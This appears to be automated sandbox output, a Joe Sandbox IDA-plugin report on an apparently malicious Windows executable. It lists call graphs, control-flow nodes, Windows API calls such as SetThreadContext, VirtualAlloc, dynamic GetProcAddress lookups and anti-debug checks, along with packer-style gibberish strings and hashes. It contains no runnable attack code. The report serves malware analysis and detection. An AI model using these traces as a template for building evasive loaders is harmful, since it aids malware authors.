5229->5227 5232 407417 __lseeki64_nolock 39 API calls 5229->5232 5234 407f87 5231->5234 5235 407f9c CloseHandle 5232->5235 5233 407fdc 5233->5075 5237 407417 __lseeki64_nolock 39 API calls 5234->5237 5235->5227 5238 407fa8 GetLastError 5235->5238 5236 401a7e __dosmaperr 39 API calls 5236->5233 5237->5229 5238->5227 5251 40752e LeaveCriticalSection 5239->5251 5241 4080b3 5241->5072 5243 4073a2 5242->5243 5244 4073fd 5242->5244 5243->5244 5249 4073cd 5243->5249 5245 401a58 __fileno 39 API calls 5244->5245 5246 407402 5245->5246 5247 401a6b __write_nolock 39 API calls 5246->5247 5248 4073f3 5247->5248 5248->5233 5248->5236 5249->5248 5250 4073ed SetStdHandle 5249->5250 5250->5248 5251->5241 5253 402dd9 LeaveCriticalSection 5252->5253 5254 402dba 5252->5254 5253->5037 5254->5253 5255 402dc1 5254->5255 5258 401b73 LeaveCriticalSection 5255->5258 5257 402dd6 5257->5037 5258->5257 5259->5012 4572 405457 4573 405433 4572->4573 4574 401a58 __fileno 39 API calls 4573->4574 4575 405438 4574->4575 4576 4031d1 __fileno 6 API calls 4575->4576 4577 405447 4576->4577 4578 404657 4579 40465e 4578->4579 4581 40466a 4578->4581 4584 4030a9 4579->4584 4582 40100f ___crtGetEnvironmentStringsA 39 API calls 4581->4582 4583 404682 4582->4583 4591 405080 4584->4591 4586 4030d6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4587 4031b2 GetCurrentProcess TerminateProcess 4586->4587 4588 4031a6 __invoke_watson 4586->4588 4589 401000 ___convertcp 5 API calls 4587->4589 4588->4587 4590 4031cf 4589->4590 4590->4581 4592 40508c __VEC_memzero 4591->4592 4592->4586 5342 4052d7 5346 4052e9 5342->5346 5343 4052ed 5344 401a58 __fileno 39 API calls 5343->5344 5345 4052f2 5343->5345 5350 405309 5344->5350 5346->5343 5346->5345 5348 405333 5346->5348 5347 4031d1 __fileno 6 API calls 5347->5345 5348->5345 5349 401a58 __fileno 39 API calls 5348->5349 5349->5350 5350->5347 5260 401b1c 5261 401b2c 5260->5261 5262 401b38 DeleteCriticalSection 5261->5262 5263 401b50 5261->5263 5264 40100f ___crtGetEnvironmentStringsA 39 API calls 5262->5264 5265 401b70 5263->5265 5266 401b62 DeleteCriticalSection 5263->5266 5264->5261 5266->5263 5421 403e9c 5422 404b23 __calloc_crt 39 API calls 5421->5422 5423 403ea8 5422->5423 5424 403845 __encode_pointer 6 API calls 5423->5424 5425 403eb0 5424->5425 4593 40175f 4594 401772 4593->4594 4595 40176d 4593->4595 4597 4014ab _malloc 3 API calls 4594->4597 4596 402bf5 __FF_MSGBANNER 39 API calls 4595->4596 4596->4594 4598 401784 4597->4598 5351 4045df 5352 405dc5 ___initmbctable 88 API calls 5351->5352 5353 4045e4 5352->5353 5354 4045f2 5353->5354 5355 404b23 __calloc_crt 39 API calls 5353->5355 5356 404619 5355->5356 5356->5354 5357 40100f ___crtGetEnvironmentStringsA 39 API calls 5356->5357 5357->5354 5426 4027a0 5427 4027d9 5426->5427 5428 4027cc 5426->5428 5429 401000 ___convertcp 5 API calls 5427->5429 5430 401000 ___convertcp 5 API calls 5428->5430 5436 4027e9 __except_handler4 __IsNonwritableInCurrentImage 5429->5436 5430->5427 5431 40286c 5432 402842 __except_handler4 5432->5431 5433 40285c 5432->5433 5435 401000 ___convertcp 5 API calls 5432->5435 5434 401000 ___convertcp 5 API calls 5433->5434 5434->5431 5435->5433 5436->5431 5436->5432 5442 40504a RtlUnwind 5436->5442 5438 4028ef 5441 401000 ___convertcp 5 API calls 5438->5441 5439 4028bb __except_handler4 5439->5438 5440 401000 ___convertcp 5 API calls 5439->5440 5440->5438 5441->5432 5442->5439 3832 401aa1 HeapCreate 3833 401ac5 3832->3833 4599 406561 4600 401457 __amsg_exit 39 API calls 4599->4600 4601 406568 4600->4601 4602 402c65 4603 402c72 4602->4603 4604 404b23 __calloc_crt 39 API calls 4603->4604 4605 402c8c 4604->4605 4606 404b23 __calloc_crt 39 API calls 4605->4606 4607 402ca5 4605->4607 4606->4607 4608 405265 4609 40527b 4608->4609 4612 405274 4608->4612 4610 401a58 __fileno 39 API calls 4609->4610 4611 405280 4610->4611 4613 4031d1 __fileno 6 API calls 4611->4613 4612->4609 4615 4052af 4612->4615 4614 40528f 4613->4614 4615->4614 4616 401a58 __fileno 39 API calls 4615->4616 4616->4611 5267 403b26 5268 403b32 __initptd 5267->5268 5269 403b4a 5268->5269 5271 403c34 __initptd 5268->5271 5272 40100f ___crtGetEnvironmentStringsA 39 API calls 5268->5272 5270 403b58 5269->5270 5273 40100f ___crtGetEnvironmentStringsA 39 API calls 5269->5273 5274 403b66 5270->5274 5275 40100f ___crtGetEnvironmentStringsA 39 API calls 5270->5275 5272->5269 5273->5270 5276 403b74 5274->5276 5277 40100f ___crtGetEnvironmentStringsA 39 API calls 5274->5277 5275->5274 5278 403b82 5276->5278 5280 40100f ___crtGetEnvironmentStringsA 39 API calls 5276->5280 5277->5276 5279 403b90 5278->5279 5281 40100f ___crtGetEnvironmentStringsA 39 API calls 5278->5281 5282 403b9e 5279->5282 5283 40100f ___crtGetEnvironmentStringsA 39 API calls 5279->5283 5280->5278 5281->5279 5284 403baf 5282->5284 5285 40100f ___crtGetEnvironmentStringsA 39 API calls 5282->5285 5283->5282 5286 401c4d __lock 39 API calls 5284->5286 5285->5284 5287 403bb7 5286->5287 5288 403bc3 InterlockedDecrement 5287->5288 5289 403bdc 5287->5289 5288->5289 5290 403bce 5288->5290 5303 403c40 5289->5303 5290->5289 5293 40100f ___crtGetEnvironmentStringsA 39 API calls 5290->5293 5293->5289 5294 401c4d __lock 39 API calls 5295 403bf0 5294->5295 5296 403c21 5295->5296 5298 405fbb ___removelocaleref 8 API calls 5295->5298 5306 403c4c 5296->5306 5301 403c05 5298->5301 5300 40100f ___crtGetEnvironmentStringsA 39 API calls 5300->5271 5301->5296 5302 405de3 ___freetlocinfo 39 API calls 5301->5302 5302->5296 5309 401b73 LeaveCriticalSection 5303->5309 5305 403be9 5305->5294 5310 401b73 LeaveCriticalSection 5306->5310 5308 403c2e 5308->5300 5309->5305 5310->5308 4617 405467 4618 405447 4617->4618 4619 40546c 4617->4619 4620 401a58 __fileno 39 API calls 4619->4620 4621 40543d 4620->4621 4622 4031d1 __fileno 6 API calls 4621->4622 4622->4618 5311 404527 5312 404563 5311->5312 5314 404539 5311->5314 5314->5312 5315 4040dd 5314->5315 5316 4040e9 __initptd 5315->5316 5317 403b0c __getptd 39 API calls 5316->5317 5318 4040ee 5317->5318 5319 40656a _abort 45 API calls 5318->5319 5320 404110 __initptd 5319->5320 5320->5312 5358 41d4e6 5359 41d4f0 5358->5359 5375 41cf20 LoadLibraryW 5359->5375 5361 41d513 5362 41cde0 2 API calls 5361->5362 5363 41d518 5362->5363 5364 41d1b0 17 API calls 5363->5364 5366 41d51d 5364->5366 5365 41d539 QueryMemoryResourceNotification 5365->5366 5366->5365 5367 41d55c InterlockedDecrement GetSystemTime 5366->5367 5368 41d570 5366->5368 5367->5366 5369 41d592 WriteConsoleOutputCharacterA 5368->5369 5370 41d5b4 5368->5370 5369->5368 5371 41d5c2 GetMonitorInfoA GetClassLongW 5370->5371 5372 41d5ec 5370->5372 5371->5370 5373 401000 ___convertcp 5 API calls 5372->5373 5374 41d5fd 5373->5374 5375->5361 4623 404569 SetUnhandledExceptionFilter 5325 403932 TlsAlloc 5376 4016f3 5377 40159b _doexit 43 API calls 5376->5377 5378 4016fe 5377->5378 5443 4018b3 5446 404128 5443->5446 5447 403a93 __getptd_noexit 39 API calls 5446->5447 5448 4018c4 5447->5448 4624 402076 4625 40208d VirtualAlloc 4624->4625 4627 4020d4 4625->4627 4628 404577 4629 404585 4628->4629 4632 40458a 4628->4632 4630 405dc5 ___initmbctable 88 API calls 4629->4630 4630->4632 4631 4045c6 4632->4631 4633 4066f4 __wincmdln 49 API calls 4632->4633 4633->4632 5449 404fb8 5450 404fca 5449->5450 5451 404fd8 @_EH4_CallFilterFunc@8 5449->5451 5452 401000 ___convertcp 5 API calls 5450->5452 5452->5451 5379 4050fa 5380 4038b7 ___crtMessageBoxW 6 API calls 5379->5380 5381 40510a 5380->5381 5382 4051a5 5381->5382 5383 40511d LoadLibraryA 5381->5383 5389 4038c0 __decode_pointer 6 API calls 5382->5389 5402 4051cf 5382->5402 5384 405132 GetProcAddress 5383->5384 5385 405247 5383->5385 5384->5385 5386 405148 5384->5386 5390 403845 __encode_pointer 6 API calls 5386->5390 5387 4051fa 5391 4038c0 __decode_pointer 6 API calls 5387->5391 5388 4038c0 __decode_pointer 6 API calls 5399 405212 5388->5399 5392 4051c2 5389->5392 5393 40514e GetProcAddress 5390->5393 5391->5385 5394 4038c0 __decode_pointer 6 API calls 5392->5394 5395 403845 __encode_pointer 6 API calls 5393->5395 5394->5402 5396 405163 GetProcAddress 5395->5396 5397 403845 __encode_pointer 6 API calls 5396->5397 5398 405178 GetProcAddress 5397->5398 5400 403845 __encode_pointer 6 API calls 5398->5400 5399->5387 5401 4038c0 __decode_pointer 6 API calls 5399->5401 5403 40518d 5400->5403 5401->5387 5402->5387 5402->5388 5403->5382 5404 405197 GetProcAddress 5403->5404 5405 403845 __encode_pointer 6 API calls 5404->5405 5405->5382 5406 4045fe 5407 404605 _strlen 5406->5407 5408 404b23 __calloc_crt 39 API calls 5407->5408 5410 404619 5408->5410 5409 4045f2 5410->5409 5411 40100f ___crtGetEnvironmentStringsA 39 API calls 5410->5411 5411->5409 5412 4044ff 5413 40450b SetLastError 5412->5413 5414 404513 __initptd 5412->5414 5413->5414

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 401aa1-401ac3 HeapCreate 1 401ac5-401ac6 0->1 2 401ac7-401ad0 0->2
                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,004017FB,00000001), ref: 00401AB6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 10892065-0
                                                                                                                          • Opcode ID: 81423c53bcf223335a8a5a01acbd3d0262ac62c925a4c43787b7a2d8bdd82cbc
                                                                                                                          • Instruction ID: 07a39966237af4d6a9052165e94da5087581865f49a7008b570ba4105093ac5e
                                                                                                                          • Opcode Fuzzy Hash: 81423c53bcf223335a8a5a01acbd3d0262ac62c925a4c43787b7a2d8bdd82cbc
                                                                                                                          • Instruction Fuzzy Hash: 43D05E3A654384AEDB109FB17C187623BDCE7843A5F048436FD0CC6190E6B4D540DA04

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 3 41d240-41d279 call 408340 6 41d280-41d285 3->6 7 41d287 6->7 8 41d28d-41d293 6->8 7->8 9 41d2a1-41d2a7 8->9 10 41d295-41d29b 8->10 9->6 11 41d2a9-41d2b5 9->11 10->9 12 41d2b7-41d2bd 11->12 13 41d2c9-41d2cc 12->13 14 41d2bf-41d2c4 12->14 15 41d2d8-41d2df 13->15 16 41d2ce-41d2d2 GetLogicalDriveStringsA 13->16 14->13 15->12 17 41d2e1-41d2e9 15->17 16->15 18 41d2f0-41d2f8 GetLastError 17->18 19 41d303-41d30b 18->19 20 41d2fa-41d301 18->20 21 41d311-41d3bb GetStringTypeExA BuildCommDCBW GetTimeFormatA SetThreadAffinityMask GetConsoleAliasExesLengthA OpenWaitableTimerA GetProcessHandleCount GetLocaleInfoA call 40109d call 40120c call 40112c call 40100f call 40109d call 4016c7 19->21 22 41d3c0-41d3c3 19->22 20->18 20->19 21->22 24 41d3c9-41d4a4 InterlockedCompareExchange GetSystemWindowsDirectoryW WriteConsoleA GetModuleHandleA SetThreadContext FindAtomA call 405080 SetDefaultCommConfigW GetConsoleAliasW MoveFileW ConnectNamedPipe ReadConsoleOutputA GetModuleFileNameA 22->24 25 41d4bd-41d4d7 LocalAlloc 22->25 34 41d4a6-41d4a9 OpenFileMappingA 24->34 35 41d4af-41d4ba call 4011f6 24->35 27 41d4d9-41d4e4 25->27 28 41d50e-41d52b call 41cf20 call 41cde0 call 41d1b0 25->28 31 41d4f0-41d500 27->31 51 41d530-41d537 28->51 37 41d502 31->37 38 41d507-41d50a 31->38 34->35 35->25 37->38 38->31 42 41d50c 38->42 42->28 53 41d546-41d54c 51->53 54 41d539-41d540 QueryMemoryResourceNotification 51->54 56 41d553-41d55a 53->56 57 41d54e call 41cdd0 53->57 54->53 60 41d567-41d56e 56->60 61 41d55c-41d565 InterlockedDecrement GetSystemTime 56->61 57->56 60->51 62 41d570-41d57b 60->62 61->60 63 41d580-41d590 62->63 64 41d592-41d5ad WriteConsoleOutputCharacterA 63->64 65 41d5af-41d5b2 63->65 64->65 65->63 66 41d5b4-41d5c0 65->66 67 41d5c2-41d5d7 GetMonitorInfoA GetClassLongW 66->67 68 41d5e3-41d5ea 67->68 69 41d5d9-41d5e1 67->69 68->67 70 41d5ec-41d600 call 401000 68->70 69->68 69->70
                                                                                                                          APIs
                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 0041D2D0
                                                                                                                          • GetLastError.KERNEL32(?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D2F0
                                                                                                                          • GetStringTypeExA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D326
                                                                                                                          • BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041D32E
                                                                                                                          • GetTimeFormatA.KERNEL32(00000000,00000000,?,wukevuvitevasegexolij,?,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D363
                                                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041D36B
                                                                                                                          • GetConsoleAliasExesLengthA.KERNEL32(?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D371
                                                                                                                          • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041D37A
                                                                                                                          • GetProcessHandleCount.KERNEL32(00000000,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D382
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D390
                                                                                                                          • _calloc.LIBCMT ref: 0041D398
                                                                                                                          • _realloc.LIBCMT ref: 0041D39F
                                                                                                                          • _malloc.LIBCMT ref: 0041D3A5
                                                                                                                          • _calloc.LIBCMT ref: 0041D3B2
                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041D3D0
                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041D3DF
                                                                                                                          • WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D3F2
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D3F9
                                                                                                                          • SetThreadContext.KERNEL32(00000000,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D401
                                                                                                                          • FindAtomA.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D408
                                                                                                                          • _memset.LIBCMT ref: 0041D41A
                                                                                                                          • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041D429
                                                                                                                          • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041D43A
                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 0041D442
                                                                                                                          • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0041D452
                                                                                                                          • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041D487
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041D497
                                                                                                                          • OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041D4A9
                                                                                                                          • LocalAlloc.KERNEL32(00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D4BF
                                                                                                                          • QueryMemoryResourceNotification.KERNEL32(00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D540
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041D561
                                                                                                                          • GetSystemTime.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D565
                                                                                                                          • WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D5AD
                                                                                                                          • GetMonitorInfoA.USER32(00000000,?), ref: 0041D5C9
                                                                                                                          • GetClassLongW.USER32(00000000,00000000), ref: 0041D5CF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Console$File$AliasCommHandleInfoInterlockedModuleOpenOutputSystemThreadTimeWrite_calloc$AffinityAllocAtomBuildCharacterClassCompareConfigConnectContextCountDecrementDefaultDirectoryDriveErrorExchangeExesFindFormatLastLengthLocalLocaleLogicalLongMappingMaskMemoryMonitorMoveNameNamedNotificationPipeProcessQueryReadResourceStringStringsTimerTypeWaitableWindows_malloc_memset_realloc
                                                                                                                          • String ID: gf@$wukevuvitevasegexolij
                                                                                                                          • API String ID: 1141306345-3314859582
                                                                                                                          • Opcode ID: 280fed795450e6cf43a57fb04f0211233d1be7e5dc6e0c5da7eed8d676b77ee5
                                                                                                                          • Instruction ID: 8a1d21a96cce7193dfe34e1f32284ac7be4b5c90a43d68034c0f8cb0ec7ffe7d
                                                                                                                          • Opcode Fuzzy Hash: 280fed795450e6cf43a57fb04f0211233d1be7e5dc6e0c5da7eed8d676b77ee5
                                                                                                                          • Instruction Fuzzy Hash: 0AA186F5904310AFD314EF65DCC4DABB7ADFB8C304F40893EFA8A92151D67899448B69

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004019CB
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004019E0
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041E210), ref: 004019EB
                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00401A07
                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00401A0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2579439406-0
                                                                                                                          • Opcode ID: a3decc1e2d959d77aeef3e4d151effea3e88d6240263e92642c303f3ead41042
                                                                                                                          • Instruction ID: 8d619fc2e9feb429aca73b3b3af3f0c94763e6e31c998104a1bdcd398ad80466
                                                                                                                          • Opcode Fuzzy Hash: a3decc1e2d959d77aeef3e4d151effea3e88d6240263e92642c303f3ead41042
                                                                                                                          • Instruction Fuzzy Hash: 6921FEB8A01214FFD720EF25EE596443BA0BB08305F80847AE80883271E7F459C6CF4E
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00004527), ref: 0040456E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 78a2c6a9ea6f1cfaa1c523ba0e549da21e5636f86bfb3241a8b3b6b434e00ed9
                                                                                                                          • Instruction ID: 232c140a11f348f4d5467bc6badb53eb9641eddd93f39b549b65abb8a794f404
                                                                                                                          • Opcode Fuzzy Hash: 78a2c6a9ea6f1cfaa1c523ba0e549da21e5636f86bfb3241a8b3b6b434e00ed9
                                                                                                                          • Instruction Fuzzy Hash: 109002F465111157864057715E0968929916E9D6037564472A701D4494DEB48000571A

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0041D115
                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 0041D121
                                                                                                                          • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041D12F
                                                                                                                          • OpenJobObjectW.KERNEL32(00000000,00000000,poxifuyubucicoyiruholefabofukup), ref: 0041D13E
                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041D150
                                                                                                                          • RegCreateKeyA.ADVAPI32(00000000,veratupamolowubifizetoxeduzi,?), ref: 0041D15E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$CalendarComputerCreateInfoMaskNodeNumaObjectOpenPathProcessorShort
                                                                                                                          • String ID: -$F$poxifuyubucicoyiruholefabofukup$veratupamolowubifizetoxeduzi
                                                                                                                          • API String ID: 2862003782-1483585335
                                                                                                                          • Opcode ID: a1c2a5110e650699430a41c18db84162bda0643848e89e094de4ff4143130b16
                                                                                                                          • Instruction ID: fe56c437a454ea6c5f795bae894c8cd01d7ae09f61aea23a1609d43891937794
                                                                                                                          • Opcode Fuzzy Hash: a1c2a5110e650699430a41c18db84162bda0643848e89e094de4ff4143130b16
                                                                                                                          • Instruction Fuzzy Hash: 0731D5B5508341AFE320DF24DC41B9BBBE0BF88715F00492DF6989B191CB749589CB6B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 86 41d4e6-41d4ed 87 41d4f0-41d500 86->87 88 41d502 87->88 89 41d507-41d50a 87->89 88->89 89->87 90 41d50c-41d52b call 41cf20 call 41cde0 call 41d1b0 89->90 98 41d530-41d537 90->98 99 41d546-41d54c 98->99 100 41d539-41d540 QueryMemoryResourceNotification 98->100 101 41d553-41d55a 99->101 102 41d54e call 41cdd0 99->102 100->99 104 41d567-41d56e 101->104 105 41d55c-41d565 InterlockedDecrement GetSystemTime 101->105 102->101 104->98 106 41d570-41d57b 104->106 105->104 107 41d580-41d590 106->107 108 41d592-41d5ad WriteConsoleOutputCharacterA 107->108 109 41d5af-41d5b2 107->109 108->109 109->107 110 41d5b4-41d5c0 109->110 111 41d5c2-41d5d7 GetMonitorInfoA GetClassLongW 110->111 112 41d5e3-41d5ea 111->112 113 41d5d9-41d5e1 111->113 112->111 114 41d5ec-41d600 call 401000 112->114 113->112 113->114
                                                                                                                          APIs
                                                                                                                          • QueryMemoryResourceNotification.KERNEL32(00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D540
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041D561
                                                                                                                          • GetSystemTime.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D565
                                                                                                                          • WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D5AD
                                                                                                                          • GetMonitorInfoA.USER32(00000000,?), ref: 0041D5C9
                                                                                                                          • GetClassLongW.USER32(00000000,00000000), ref: 0041D5CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharacterClassConsoleDecrementInfoInterlockedLongMemoryMonitorNotificationOutputQueryResourceSystemTimeWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3946633259-0
                                                                                                                          • Opcode ID: 7e59e35649b4e3531b9c362b26030efc782f5ad58305feb91430bf0b98d4c1fd
                                                                                                                          • Instruction ID: 9b26e32d6c9af59d5edcbb57e1d6281186450faf621e80aed0b5edbb5270efb7
                                                                                                                          • Opcode Fuzzy Hash: 7e59e35649b4e3531b9c362b26030efc782f5ad58305feb91430bf0b98d4c1fd
                                                                                                                          • Instruction Fuzzy Hash: F4213FB1D44320ABD710EF21DC817FBB766EBC4319F01843FEA8957251D6749885CB9A

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
